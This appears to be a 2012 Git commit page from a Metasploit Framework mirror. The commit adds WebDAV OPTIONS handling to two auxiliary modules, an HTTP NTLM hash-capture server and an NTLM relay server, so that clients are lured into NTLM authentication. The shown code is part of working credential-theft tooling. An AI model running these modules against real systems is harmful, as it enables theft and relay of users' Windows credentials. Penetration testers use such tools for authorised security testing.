infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'webdav_fix' of https://github.com/mubix/metasploit-framework into mubix-webdav_fix

unstable
sinn3r 2012-08-24 11:18:50 -05:00
parent ea7d7b847a d0558218ee
commit 3036f7725d
2 changed files with 86 additions and 42 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
modules/auxiliary/server/capture/http_ntlm.rb
View File

@ -68,6 +68,10 @@ class Metasploit3 < Msf::Auxiliary
def on_request_uri(cli, request) def on_request_uri(cli, request)
print_status("Request '#{request.uri}'...") print_status("Request '#{request.uri}'...")
case request.method
when 'OPTIONS'
process_options(cli, request)
else
# If the host has not started auth, send 401 authenticate with only the NTLM option # If the host has not started auth, send 401 authenticate with only the NTLM option
if(!request.headers['Authorization']) if(!request.headers['Authorization'])
response = create_response(401, "Unauthorized") response = create_response(401, "Unauthorized")
@ -86,6 +90,7 @@ class Metasploit3 < Msf::Auxiliary
cli.send_response(response) cli.send_response(response)
end end
end end
end
def run def run
if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{16})$/ if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{16})$/
@ -97,6 +102,23 @@ class Metasploit3 < Msf::Auxiliary
exploit() exploit()
end end
def process_options(cli, request)
print_status("OPTIONS #{request.uri}")
headers = {
'MS-Author-Via' => 'DAV',
'DASL' => '<DAV:sql>',
'DAV' => '1, 2',
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
'Cache-Control' => 'private'
}
resp = create_response(207, "Multi-Status")
headers.each_pair {|k,v| resp[k] = v }
resp.body = ""
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end
def handle_auth(cli,hash) def handle_auth(cli,hash)
#authorization string is base64 encoded message #authorization string is base64 encoded message
message = Rex::Text.decode_base64(hash) message = Rex::Text.decode_base64(hash)

22
modules/auxiliary/server/http_ntlmrelay.rb
View File

@ -94,6 +94,10 @@ class Metasploit3 < Msf::Auxiliary
# Handles the initial requests waiting for the browser to try NTLM auth # Handles the initial requests waiting for the browser to try NTLM auth
def on_request_uri(cli, request) def on_request_uri(cli, request)
case request.method
when 'OPTIONS'
process_options(cli, request)
else
datastore['REQUEST_IP'] = cli.peerhost datastore['REQUEST_IP'] = cli.peerhost
cli.keepalive = true; cli.keepalive = true;
@ -126,12 +130,30 @@ class Metasploit3 < Msf::Auxiliary
handle_relay(cli,hash) handle_relay(cli,hash)
end end
end
def run def run
parse_args() parse_args()
exploit() exploit()
end end
def process_options(cli, request)
print_status("OPTIONS #{request.uri}")
headers = {
'MS-Author-Via' => 'DAV',
'DASL' => '<DAV:sql>',
'DAV' => '1, 2',
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
'Cache-Control' => 'private'
}
resp = create_response(207, "Multi-Status")
headers.each_pair {|k,v| resp[k] = v }
resp.body = ""
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end
#The call to handle_relay should be a victim HTTP type 1 request #The call to handle_relay should be a victim HTTP type 1 request
def handle_relay(cli_sock, hash) def handle_relay(cli_sock, hash)
print_status("Beginning NTLM Relay...") print_status("Beginning NTLM Relay...")